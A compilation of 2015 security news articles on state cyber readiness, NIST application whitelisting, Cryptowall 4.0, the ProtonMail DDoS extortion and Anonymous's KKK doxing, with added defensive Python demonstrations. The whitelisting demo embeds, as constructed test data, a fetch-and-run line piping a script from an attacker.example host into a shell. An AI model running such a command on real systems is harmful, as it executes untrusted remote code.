STE WILLIAMS

States’ Cybersecurity Readiness Presents "Grim Picture" Pell Study Finds

Just eight states of 50 fared decently in a Pell study on their preparedness to deal with current and emerging cyberthreats.

Discussions about the cybersecurity readiness of government agencies have tended to focus on federal entities rather than on their state counterparts. That may be a big mistake.

A new study by the Pell Center for International Relations and Public Policy at Salve Regina University revealed a troubling lack of preparedness to deal with cybersecurity threats among a vast majority of state governments.

All 50 states are investing in broadband communication and moving forward aggressively on promoting wider use of the Internet to stimulate economic growth and to improve service. But not a single one of them managed to meet all the evaluation criteria that Pell used to measure their cyber readiness, says Francesca Spidalieri, senior fellow for cyber leadership and author of the report.

“The study was really meant to bring awareness to the role that state governments, not just the federal government, play in protecting critical infrastructure and the data that has been entrusted to them by their citizens,” Spidalieri says.

Just like the federal government, state governments, too, hold data on millions of citizens and depend heavily on the Internet and communications technologies to deliver services and to maintain critical infrastructure. But few appear to be considering the potential exposure and costs associated with cyber threats, says Spidalieri.

For the study, Pell looked at measures like whether the state had a strategic cybersecurity plan, formal incident response capabilities, data breach notification and other cybersecurity laws, threat information-sharing mechanisms, and spending on cybersecurity R&D. Pell interviewed state CIOs, chief information security officers, and other state government officials, and also reviewed open source data, to arrive at its conclusions.

California, Texas, Maryland, and Washington were among eight states identified by the study as relatively more prepared to deal with current and emerging cyber threats than their counterparts. The others are New York, New Jersey, Michigan, and Virginia.

Each of these states fared better than others on some of the key measures used to evaluate them. For example, California scored well in areas like incident response, e-crime laws, and cyber R&D, but its performance in areas like regular threat assessments and accountability for cyber preparedness remained a work in progress. Pell assessed Texas as adequate in areas like having a competent cybersecurity authority, doing regular threat assessments, and following the NIST Cybersecurity Framework, but found it still has work to do in implementing effective cybersecurity laws. Michigan appeared to be the most prepared, meeting most of the measures it was evaluated against.

A vast majority of states, though, are unprepared, says Spidalieri. “Most states don’t even mention the need to secure their IT systems or to address cyber threats,” she said. Some acknowledge the problem but appear to have done little to address it.

The common challenges, somewhat unsurprisingly, related to a lack of funding for cybersecurity programs, lack of executive engagement, the growing sophistication of threats, and a shortage of cybersecurity professionals. “It’s a grim picture and my report was meant to shed some light on the states that are leading the way,” she said.

Meanwhile, a second report also released this week served up another reminder of the challenges that federal agencies continue to face on the cybersecurity front. The report by MeriTalk and Palo Alto Networks found that 44 percent of federal endpoints are vulnerable to cyber threats while 30 percent of federal network connected devices have been infected with some type of malware.

As with state governments, barely half of all federal agencies have taken specific steps to secure endpoints while some 20 percent of endpoint security audits do not include all network-connected devices.

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: http://www.darkreading.com/government/states-cybersecurity-readiness-presents--grim-picture--pell-study-finds/d/d-id/1323042?_mc=RSS_DR_EDT


Considering application whitelist tryst? NIST will help you clear the mist

Hardening: The US National Institute of Standards and Technology has published a guide to whitelisting that can help organisations deploy one of the most important defensive security technologies.

Application whitelisting is chief among the Australian Signals Directorate’s much-lauded Top 4 Strategies to Mitigate Targeted Cyber Intrusions for its ability to drastically reduce attack surfaces and help identify and block suspicious executables.

The Skip spies say that, when done right, application whitelisting is an “incredibly effective” way to ensure defence, stability and consistency, but it is often borked in organisations such that it offers only an impression of security.

The ASD stresses that the technology is not merely a gateway through which only approved applications can be installed, nor simply a block on users writing to local drives.

Now NIST has offered more application whitelisting fodder to complement the ASD guidance: its Guide to Application Whitelisting [pdf] (Special Publication 800-167), which it hopes will help organisations with the basics of the concept along with implementation support.

The agency’s senior advisor Adam Sedgewick and computer scientist Murugiah Souppaya authored the guide with Scarfone Cybersecurity scribe Karen Scarfone.

“An application whitelist is a list of applications and application components that are authorised to be present or active on a host according to a well-defined baseline,” the trio write.

“If design decisions are incorrect, then the application whitelisting implementation will be more susceptible to compromise and failure.”

The team summarises five recommendations for deploying an effective application whitelist, including first evaluating built-in operating system capabilities, using more sophisticated whitelisting attributes such as digital signatures or cryptographic hashes rather than simple file-path rules unless strict access controls are in place, and testing deployments in monitoring (audit) mode prior to roll-out.

A risk assessment should be the first order of business, however, since application whitelisting can impose a considerable functionality burden.

“An application whitelisting technology might be considered unsuitable if, for instance, it had to be disabled in order to install security updates for the operating system or particular applications,” the team says.

“A combination of digital signature and publisher and cryptographic hash techniques generally provides the most accurate and comprehensive application whitelisting capability, but usability and maintainability requirements can put significant burdens on the organisation.”

Roll outs should be phased using clear processes that will help minimise pitfalls, NIST adds. ®
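The attribute trade-off NIST describes above (file-path rules that are only as strong as the access controls on the directory, versus signature or hash rules that are bound to the file's content) and the value of a monitoring phase before enforcement are easier to see in code. The following is an added Python illustration, not code from NIST's guide, from the ASD, or from the article; the policy object, the file contents and the paths are constructed for the demonstration, and a real deployment would hash the binary on disk and consult the operating system's own whitelisting facility.

```python
"""Toy application-whitelist evaluator contrasting path-based and hash-based
attributes, and NIST's monitoring (audit) mode versus enforcement.
Added illustration; not NIST's or ASD's code. Policy layout is hypothetical."""
import hashlib
from dataclasses import dataclass, field
from typing import List, Set, Tuple

# Constructed stand-ins for executables; real deployments hash the binary on disk.
APPROVED_BACKUP = b"#!/bin/sh\n/usr/bin/tar czf /srv/backup.tgz /srv/data\n"
TROJANED_BACKUP = APPROVED_BACKUP + b"curl -s http://attacker.example/p | sh\n"
PATCHED_BACKUP = b"#!/bin/sh\n/usr/bin/tar czf /srv/backup.tgz /srv/data --exclude=tmp\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class WhitelistPolicy:
    """Hypothetical policy object. SP 800-167 describes the attribute types
    (file path, publisher/signature, cryptographic hash); this layout is ours."""
    allowed_paths: Set[str] = field(default_factory=set)   # weak: only as good as write ACLs
    allowed_hashes: Set[str] = field(default_factory=set)  # strong: bound to file content
    enforce: bool = False                                  # False = monitoring/audit mode
    events: List[str] = field(default_factory=list)

    def matched_attribute(self, path: str, content: bytes) -> str:
        """Return which attribute authorised the file: 'hash', 'path' or ''."""
        if sha256_hex(content) in self.allowed_hashes:
            return "hash"
        if path in self.allowed_paths:
            return "path"
        return ""

    def allow_execution(self, path: str, content: bytes) -> bool:
        """Decide whether the host may run the file; always log the decision."""
        attr = self.matched_attribute(path, content)
        if attr:
            self.events.append(f"ALLOW {path} via {attr}")
            return True
        verdict = "BLOCK" if self.enforce else "WOULD-BLOCK"
        self.events.append(f"{verdict} {path} sha256={sha256_hex(content)[:16]}")
        return not self.enforce   # audit mode records the miss but lets it run

    def approve_update(self, old_content: bytes, new_content: bytes) -> None:
        """Baseline maintenance: a patched binary has a new hash, so the policy
        is updated rather than the whitelist being switched off for the update."""
        self.allowed_hashes.discard(sha256_hex(old_content))
        self.allowed_hashes.add(sha256_hex(new_content))


def path_only_is_bypassable() -> bool:
    """An attacker who can write to the approved directory swaps the file."""
    policy = WhitelistPolicy(allowed_paths={"/opt/tools/backup.sh"}, enforce=True)
    return policy.allow_execution("/opt/tools/backup.sh", TROJANED_BACKUP)  # True: bypassed


def hash_policy_blocks_tamper() -> bool:
    """Same swap against a hash-based rule: the content no longer matches."""
    policy = WhitelistPolicy(allowed_hashes={sha256_hex(APPROVED_BACKUP)}, enforce=True)
    return policy.allow_execution("/opt/tools/backup.sh", TROJANED_BACKUP)  # False


def audit_mode_run() -> Tuple[bool, List[str]]:
    """Monitoring mode before roll-out: an unknown file runs, but the gap is logged."""
    policy = WhitelistPolicy(allowed_hashes={sha256_hex(APPROVED_BACKUP)})
    ran = policy.allow_execution("/home/alice/tool.sh", TROJANED_BACKUP)
    return ran, policy.events


def patch_cycle() -> Tuple[bool, bool, bool]:
    """A patched binary is blocked until approved; the old hash is then retired."""
    policy = WhitelistPolicy(allowed_hashes={sha256_hex(APPROVED_BACKUP)}, enforce=True)
    before = policy.allow_execution("/opt/tools/backup.sh", PATCHED_BACKUP)
    policy.approve_update(APPROVED_BACKUP, PATCHED_BACKUP)
    after = policy.allow_execution("/opt/tools/backup.sh", PATCHED_BACKUP)
    old = policy.allow_execution("/opt/tools/backup.sh", APPROVED_BACKUP)
    return before, after, old  # (False, True, False)


if __name__ == "__main__":
    print("path-only rule bypassed:", path_only_is_bypassable())
    print("hash rule blocks tamper:", not hash_policy_blocks_tamper())
    ran, events = audit_mode_run()
    print("audit mode let it run:", ran, events)
    print("patch cycle (before, after, old):", patch_cycle())
```

The WOULD-BLOCK events from the audit run are the list an administrator reviews before flipping `enforce` on; the patch cycle shows why a hash-based baseline needs a maintenance step rather than being disabled for updates, which is exactly the unsuitability test the NIST authors describe.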


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/considering_application_whitelist_tryst_nist_will_help_you_clear_the_mist/

GCHQ’s infosec arm bins advisor accreditation scheme

GCHQ’s communications security arm, CESG, has been accused of leaving a gaping hole in the government security advisor profession by axing its accreditation scheme.

The CESG Listed Advisor Scheme (CLAS), the accreditation programme for private sector consultants providing information assurance advice to the public, is to be closed in January next year. It means that some 700 approved advisers will lose their accreditation and customers will have no way of verifying whether security advisers have the necessary government expertise.

The scheme is to be replaced with Certified Cyber Security Consultancy, which accredits companies rather than individuals. However, no companies have yet signed up.

A survey of CLAS customers seen by The Register suggested that many still valued the scheme.

One government-accredited security advisor who asked not to be named said the new “companies scheme” is at odds with Whitehall’s agenda of working with SMEs, as it squeezes out independent advisers in favour of larger suppliers.

He said: “We seem to be running the risk of losing substantial numbers of potentially key individuals in a Cabinet Office driven information assurance brain drain away from government work.”

The source claimed there had been zero consultation or discussion between CESG and the CLAS practitioner community as to the right balance for future information assurance regimes in the UK public sector.

“Instead of using 700 consultants with, let’s assume, 10 years’ experience each in every sector of central and local government, as suppliers and client side, and with many former civil servants of decades’ standing in their midst, CESG have decided – for reasons surely only they can explain – to drop the scheme wholesale and chase new (as yet poorly defined) models of working.”

Another security advisor said: “The business change has been handled so badly. Even now CESG is still promoting CLAS on its website.” He added: “But soon customers will be in a position where they have no way of knowing if this person knows about government security.”

Another joked: “CESG has some good people, but they are clearly too busy listening to people’s phone conversations to listen to the profession and government customers.”

He added: “Customers are confused and puzzled about why it has been discontinued. When the companies replacement gets off the ground, it’ll only be the big system integrators who benefit.”

A fourth practitioner, who also asked not to be named, acknowledged that the scheme had not been perfect, but said issues around a perceived deterioration of skills could have been addressed without disregarding the whole programme.

A spokeswoman from CESG said it has decided to close CLAS “because both our customers and the CLAS Members’ Forum itself told us it was no longer delivering the consistent, high quality, value for money consultancy needed. The replacement – Certified Cyber Security Consultancy – tackles these issues and is open to independent consultants who can demonstrate that they have the skills needed for the cyber security challenges of today.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/cesg_abandons_advisor_accreditation_scheme_leaves_gap_in_profession/

Let’s Encrypt gets automation

Hoping to expand the pool of Let’s Encrypt testers, TrueCrypt audit project co-founder Kenneth White has run up a set of scripts to automate the process of installing certificates under the Mozilla-backed open CA.

White, co-director of the Open Crypto Audit Project, has posted the work on GitHub. He explains that the project is quite simple, consisting of Python scripts to “stand up the official Let’s Encrypt certificate management ACME client tool” in the target environments.

These include Debian, Amazon Linux (for AWS), CentOS, Red Hat and FreeBSD.

White says while he considers Let’s Encrypt to be an important project, at this early stage of development, the official client “can be fragile and error-prone on some systems”.

Having had to batter his own head against the client, White says he cleaned up the process in his scripts to make Let’s Encrypt more accessible to other users.

He notes that Let’s Encrypt should still be considered in-development, and warns against running either the Let’s Encrypt client or his scripts in production systems:

“LE is still in beta and has some rough edges”, White notes, “including silently invoking sudo and installing quite a few development packages”.

Let’s Encrypt was announced at the end of 2014 by Mozilla with the backing of Cisco and the Electronic Frontier Foundation. Its aim is to give a push to the encrypt-everything movement by making certificates available, free and automatically, to those who can’t afford to buy certificates from commercial CAs.

The group issued its first certificate in September this year, and in October, through a cross-signature from IdenTrust, became trusted by the world’s major browsers.

Let’s Encrypt is currently running as an invitational beta. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/lets_encrypt_gets_automation/

Cryptowall 4.0: Update makes world’s worst ransomware worse still

The fourth iteration of the world’s worst ransomware Cryptowall has surfaced with gnarlier encryption tactics and better evasion tricks that have fooled current antivirus platforms.

Ransomware has ripped through scores of businesses and end-user machines in sporadic and targeted attacks that have cost victims millions of dollars in ransom payments made to criminals who have illegally encrypted valuable files.

The worst offenders remain at large, including a single group that may be behind Cryptowall 3.0 and is estimated by the Cyber Threat Alliance to have made some US$325 million this year, dwarfing FBI figures from June which put its take from US victims alone at about US$18 million over roughly a year.

Andra Zaharia of Denmark-based Heimdal Security says Cryptowall 4.0 is employing “vastly improved” communications and better code, so it can exploit more vulnerabilities.

“Cryptowall 4.0 still includes advanced malware dropper mechanisms to avoid antivirus detection, but this new version possesses vastly improved communication capabilities,” Zaharia says.

“It includes a modified protocol that enables it to avoid being detected, even by second generation enterprise firewall solutions.

“This lowers detection rates significantly compared to the already successful Cryptowall 3.0 attacks.”

For example, the nasty-ware now alters filenames as well as file contents, so it’s harder for victims to work out what’s been encrypted.
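Both behaviours the article describes, originals vanishing in favour of random-named files of opaque content (the 4.0 change) and existing files being overwritten in place with ciphertext (the earlier style), leave a signature that a simple snapshot-diff heuristic can catch: Shannon entropy close to 8 bits per byte where documents sat at 3 to 5, and file names with letters and digits interleaved as no human would type them. The following is an added Python illustration, not code from Heimdal Security or from the article; the entropy and naming thresholds are assumptions, the directory snapshots are constructed, and the pseudo-random bytes stand in for ciphertext rather than being real encryption.

```python
"""Snapshot-diff heuristic for Cryptowall-style activity: originals vanish and
random-named, high-entropy files appear, or existing files' entropy jumps
(in-place encryption). Added illustration; thresholds are assumptions."""
import math
import random
from typing import Dict

ENTROPY_THRESHOLD = 7.5   # bits/byte; documents and source sit well below this
ENTROPY_JUMP = 2.0        # bits/byte increase that flags in-place encryption
MIN_HITS = 2              # indicators needed before raising an alert


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant input)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def looks_random_name(name: str) -> bool:
    """Heuristic for machine-generated names like '27p9k96gwaod.x3ap': an
    alphanumeric stem of 8+ characters with letters and digits interleaved at
    least three times. 'backup2015.zip' has one transition and is not flagged."""
    stem, _, ext = name.lower().rpartition(".")
    if len(stem) < 8 or not stem.isalnum() or not ext.isalnum():
        return False
    transitions = sum(1 for a, b in zip(stem, stem[1:]) if a.isdigit() != b.isdigit())
    return transitions >= 3


def assess(before: Dict[str, bytes], after: Dict[str, bytes]) -> dict:
    """Compare two directory snapshots {filename: content} and score them."""
    missing = [n for n in before if n not in after]
    new_ciphertext = [n for n in after if n not in before
                      and looks_random_name(n)
                      and shannon_entropy(after[n]) >= ENTROPY_THRESHOLD]
    entropy_jump = [n for n in after if n in before
                    and shannon_entropy(after[n]) - shannon_entropy(before[n]) >= ENTROPY_JUMP]
    renamed = min(len(missing), len(new_ciphertext))   # originals replaced by opaque files
    verdict = renamed >= MIN_HITS or len(entropy_jump) >= MIN_HITS
    return {"missing": missing, "new_ciphertext": new_ciphertext,
            "entropy_jump": entropy_jump, "verdict": verdict}


# ---- constructed sample snapshots ------------------------------------------
def _text(line: str, reps: int = 40) -> bytes:
    return (line * reps).encode()


def _opaque(seed: int, size: int = 4096) -> bytes:
    """Deterministic pseudo-random bytes standing in for ciphertext (not real encryption)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(size))


BEFORE = {
    "report.docx": _text("Quarterly report: revenue grew 3% on lower costs. "),
    "budget.xlsx": _text("item,amount\nlaptops,1200\ntravel,800\n"),
    "notes.txt": _text("call vendor about renewal; update runbook\n"),
    "backup2015.zip": _opaque(99),   # legitimately high-entropy archive, unchanged
}
AFTER_RANSOMED = {                    # 4.0 style: names and contents replaced
    "27p9k96gwaod.x3ap": _opaque(1),
    "b3n0q8z1k4tf.p7qa": _opaque(2),
    "7yu4wq9v1ca8.hj2k": _opaque(3),
    "backup2015.zip": BEFORE["backup2015.zip"],
    "HELP_YOUR_FILES.HTML": b"<html>Your files are encrypted. Pay to decrypt.</html>",
}
AFTER_INPLACE = dict(BEFORE, **{"report.docx": _opaque(4), "budget.xlsx": _opaque(5)})
AFTER_BENIGN = dict(BEFORE)
AFTER_BENIGN["notes.txt"] = BEFORE["notes.txt"] + _text("renewal done; ticket closed\n", 10)
AFTER_BENIGN["report_v2.docx"] = _text("Quarterly report (revised): revenue grew 3.2%. ")

if __name__ == "__main__":
    for label, snap in (("ransomed", AFTER_RANSOMED), ("in-place", AFTER_INPLACE), ("benign", AFTER_BENIGN)):
        print(label, assess(BEFORE, snap))
```

The unchanged archive shows why entropy alone is a poor signal (compressed and already-encrypted files are legitimately opaque); the heuristic only fires when high entropy coincides with a rename or with a jump relative to the previous snapshot of the same file.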

Ransom payments in the latest version are badged as a price tag for security software.

Net scum are still communicating with Cryptowall 4.0 over Tor and using hacked web pages to deliver payloads that include botnet componentry to assist further malware delivery.

Actors have tried various tactics to get ransomware on machines and thwart back up efforts.

One of the most unusual was a variant that silently encrypted and decrypted databases on the fly in a bid to avoid detection. That meant months of backups would contain encrypted data that could not be decrypted unless a ransom was paid for the respective key.

Another revealed last week threatened user data would be published online if a ransom was not paid. There is no indication the Chimera ransomware lived up to that capability according to analysis.

It follows the death of the Coinvault and Bitcryptor ransomware which Kaspersky confirmed after the arrest of the alleged authors and release of all 14,000 decryption keys. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/09/cryptowall_40/

Voting machine memory stick drama in Georgia sparks scandal, probe

The US state of Georgia is delving into a claim that a misplaced electronic ballot box may have swung a key vote.

On November 3, in the county of DeKalb just east of Atlanta, LaVista Hills held a vote on whether to become a city. In a closely run race, the motion was defeated by 136 votes – less than one per cent of the electorate.

But Leonard Piazza, who works in the county’s office of voter registration and elections, claims a mislaid memory stick is proof the count was bungled – or, worse, rigged.

On Thursday, he told Channel 2 Action News he found a memory card of the type used by the state’s voting machines loose in the office, and fears votes stored on the device were not counted.

Citizens in the state use Diebold computers to vote in elections and referendums, their votes being electronically stored and counted.

Piazza claims that when he told his superior about the misplaced memory stick, and the possibility of uncounted votes, she refused to investigate it, and placed him on administrative leave.

On the orders of Georgia Secretary of State Brian Kemp, a formal investigation is now underway into Piazza’s claims: officials have confiscated the memory stick and one of DeKalb County’s voting machines used in the LaVista Hills ballot.

“As Secretary of State I take any allegations of elections fraud seriously,” said Kemp.

“Given the serious nature of these allegations, I have asked the Center for Election Systems at Kennesaw State University and the GBI [Georgia Bureau of Investigation] to assist in this investigation. I asked the GBI to assist due to the alleged theft of secured memory cards and fraud allegations. Once completed, the investigation will be presented to the state elections Board. We will have no further comment until that time.”

Meanwhile, Piazza himself has come under scrutiny. He previously worked for an election board in Pennsylvania before being let go. He sued his former employer over claims that he was removed from his job because he wanted to expose corruption in the voting system.

Piazza’s boss Maxine Daniels says the whole thing is a case of a disgruntled employee making waves, and insists the vote was fair. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2015/11/06/georgia_voter_fraud_investigation/

What Flu Season Can Teach Us About Fighting Cyberattacks

Cybersecurity doesn’t have to be an arms race towards complexity if we put people front and center of the solution.

Every winter there is an outbreak of flu. The virus evolves rapidly and mutates. Annually the flu causes three to five million cases of severe illness and the death toll can reach half a million people. Serious pandemics like the Asian Flu, Hong Kong Flu, and Spanish Flu each claimed more than a million lives. In 2009, the Swine Flu pandemic outbreak began in Veracruz, Mexico. Swine Flu infected an estimated 10 million to 200 million people. But the outbreak was controlled, and the confirmed death toll of 18,500 (a fatality rate of roughly 0.03%) was far lower than experts at first feared.

Despite the dramatic toll that influenza takes, it has been well controlled by a few basic best practices. Good health and hygiene practices, including frequent hand washing, covering coughs and sneezes, and avoiding close contact with sick people, reduce the transmission of the flu virus. According to the Centers for Disease Control, hand washing is the single most important thing we can do to keep from getting sick and spreading illness to others. Vaccination has also helped reduce the risk of getting the flu by up to 90%.

While cybersecurity breaches don’t kill people, the costs can be very high. But unlike public health emergencies, breach responses tend to be isolated, uncoordinated, and unfortunately not very effective; our industry regularly overlooks effective, common-sense approaches and fundamental preventative security controls. For example, the Office of Personnel Management’s own Inspector General warned the agency the year before its massive breach to implement elementary preventive measures. OPM failed to heed those warnings and got hacked.

Promoting best security practices is a lot like promoting healthy hygiene. The more people we can recruit to adopt basic, effective security practices, the safer we will all be. There’s no reason we can’t combat malware as effectively as we respond to biological viruses.

We have to change our ways.

The estimated annual cost of influenza in the U.S. ranges up to $87 billion, according to the National Institutes of Health. Cybercriminals last year stole six times more from the global economy than the U.S. spent fighting the flu. McAfee estimates annual global losses to cybercrime approached half a trillion dollars in 2014 (0.69% of U.S. GDP) with more than 200,000 jobs lost in the United States. In the battle against cybercrime, we continue to fall behind.

Our fundamental challenge is asymmetry. As every hacker knows, any system or company is only as secure as its weakest link. Organizations need to protect every device, server, application, system, credential, and user. But a hacker only needs to steal just one user ID and password to get in. The way to improve cybersecurity is to take this traditional weakness and turn it against the enemy by drafting users into the solution. Instead of being a point of vulnerability, users become our front line defense by focusing on the fundamentals of good security hygiene — the digital equivalent of washing your hands or covering your mouth when you cough. If we all incorporated these four simple practices into our daily lives, we’d shut down most cyberattacks:

  • Update the devices and software you use frequently. Vendors constantly patch bugs in their products. If you don’t have a policy to run the latest versions of software releases on your servers, laptops, and smartphones, you’re leaving known vulnerabilities open to hackers.
  • The most popular password in the world remains 123456. Stop trying to memorize lengthy passwords. Use a password manager like LastPass that automates the generation of complex passwords.
  • Use two-factor authentication. A hacker may steal your passwords, but it’s nearly impossible to steal those and your smartphone or token at the same time.
  • Use common sense with your email. Never open email attachments or click on links from a sender you don’t know and trust.

Share these suggestions with your work colleagues, friends, and family. Cybersecurity doesn’t have to be an arms race towards complexity. Like fighting the spread of a deadly flu, it’s much better if we put people front and center as part of the solution.

Prior to co-founding Duo Security where he serves as CEO, Dug Song spent seven years as founding chief security architect at Arbor Networks, developers of network software that protects 80 percent of the world’s Internet service providers. Before Arbor, Song built the first …

Article source: http://www.darkreading.com/endpoint/what-flu-season-can-teach-us-about-fighting-cyberattacks/a/d-id/1323038?_mc=RSS_DR_EDT

Encrypted email provider ProtonMail caves in to extortion, hands over $6000


Swiss-based encrypted email provider ProtonMail – developed at the CERN research facility in 2013 to withstand surveillance by the world’s increasingly inquisitive intelligence agencies – has revealed that it handed over 15 bitcoins (about $6000/£4000) to stop a Distributed Denial of Service (DDoS) attack.

With the company’s main site still down, ProtonMail took to WordPress to explain the situation, saying:

Slightly before midnight on November 3rd, 2015, we received a blackmail email from a group of criminals who have been responsible for a string of DDOS attacks which have happened across Switzerland in the past few weeks.

Shortly afterward, the company explained, it came under a DDoS attack which took it offline for around 15 minutes.

On 4 November, a further attack was initiated at approximately 11:00. Despite the best efforts of its datacenter and upstream provider, ProtonMail toppled over in the face of what it calls “an unprecedented level of sophistication”, as a coordinated attack exceeded 100 Gbps.

As the scope of the attack increased, it wasn’t just the company’s datacenter that was knocked out but also the ISP it used, thereby impacting hundreds of other firms.

It was this collateral damage, the company said, that led to it coughing up the Bitcoin:

At this point, we were placed under a lot of pressure by third parties to just pay the ransom, which we grudgingly agreed to do at 3:30PM Geneva time.

At this point you may assume that the story is over – after all, many gangs behind online ransom crime do indeed unlock files or cease attacks when the cash is handed over – because good “customer service” ensures the next victim pays too.

But in this case, the DDoS attack was not called off. Indeed, at the time of writing, protonmail.com is still inaccessible.

Taking to Twitter, the company reiterated why it gave in to blackmail, saying:

Over 100 companies were taken offline from the attack against us. Impacted companies asked us to pay, we couldn’t refuse.

Responding to questions on the social network, ProtonMail confirmed that many of the companies who had asked it to pay up had contributed to a defence fund (it has already raised $14,000 of its $50,000 target) set up to help it improve its infrastructure in a bid to thwart future attacks.

In slightly better news, customers of the service, which has around half a million users, can breathe easy, safe in the knowledge that their “data is safe and untouched.”

As the criminal investigation continues, ProtonMail says it is working with the Swiss Governmental Computer Emergency Response Team (GovCERT) and the Cybercrime Coordination Unit Switzerland (CYCO), with added assistance from Europol.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/fD6HeV6mHKU/

Anonymous "unhoods" alleged KKK members but innocents are smeared


Members of the loose hacker collective Anonymous followed through on a pledge to release the names of members of the Ku Klux Klan, but #OpKKK was flawed from the get-go by uncoordinated document dumps and smearing of innocent people who are in no way connected to the KKK.

The plan for the op was to “unhood” 1000 members of the notorious hate group KKK and spur dialogue on racism.

On Thursday, 5 November, Guy Fawkes Day, a date Anonymous has adopted as its own, members of the group exposed hundreds of names of alleged KKK members, publishing links to their social media accounts on Pastebin.

A Twitter account, @Operation_KKK, publicized the link to documents, and had been actively promoting the op for several days prior.

Anonymous said it used “human intelligence” to identify KKK members, and many of the social media accounts show racist imagery and messages.

Soon after the document dump, however, the group was forced to remove some of the names, admitting that the list was not completely accurate.


We removed several names from our list for further investigation. We would rather have a smaller, accurate list that we are comfortable with

One person included in the dump was Ben Garrison, a political cartoonist whose name has been erroneously associated with racist memes that reuse some of his cartoons.

Garrison told the Washington Post that he is in no way a white supremacist, but that anti-semitic memes using his cartoons have “ruin[ed] my online reputation as well as my commercial art business.”

A similar document dump under the flag of Anonymous’s OpKKK was released on Monday by a Twitter user calling himself “Amped Attacks”, but that list of names included several prominent US Senators and mayors who denied any involvement with the KKK.

The @Operation_KKK account disavowed any affiliation and said the group does not “recklessly involve innocent individuals.”


This account has NOT YET released any information. We believe in due diligence and will NOT recklessly involve innocent individuals #OpKKK

The Guy Fawkes Day “doxing” of alleged KKK members continues Anonymous’s online war against the KKK that goes back at least as far as November 2014.

Back then, in the aftermath of months of protests in Ferguson, Missouri over the shooting of an unarmed black teenager by a white police officer, members of the KKK promised to use “lethal force” against protesters.

Anonymous responded by hacking a KKK Twitter account and promised to expose KKK members.

Anonymous members took up the mantle of anti-racism in support of the Ferguson protesters immediately after the shooting of Michael Brown.

The group said it would expose the officer involved in the shooting before his name was officially released, but an Anonymous-affiliated Twitter account identified the wrong Ferguson officer, who went into hiding after receiving death threats.

With so many innocent people erroneously exposed to physical danger and reputation-damaging slander in these incidents, it seems like Anonymous’s message could be drowned out by blowback about its tactics.

Those tactics are not just potentially harmful – they are also illegal.

As Naked Security writer Lisa Vaas pointed out last year, hacktivism isn’t likely to solve societal problems like racism:

Illegal posting of others’ personal information isn’t the way to solve the enormous problems of racism, no matter how satisfying it is to knock a group like the KKK down to the ground.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/82G9quabeYY/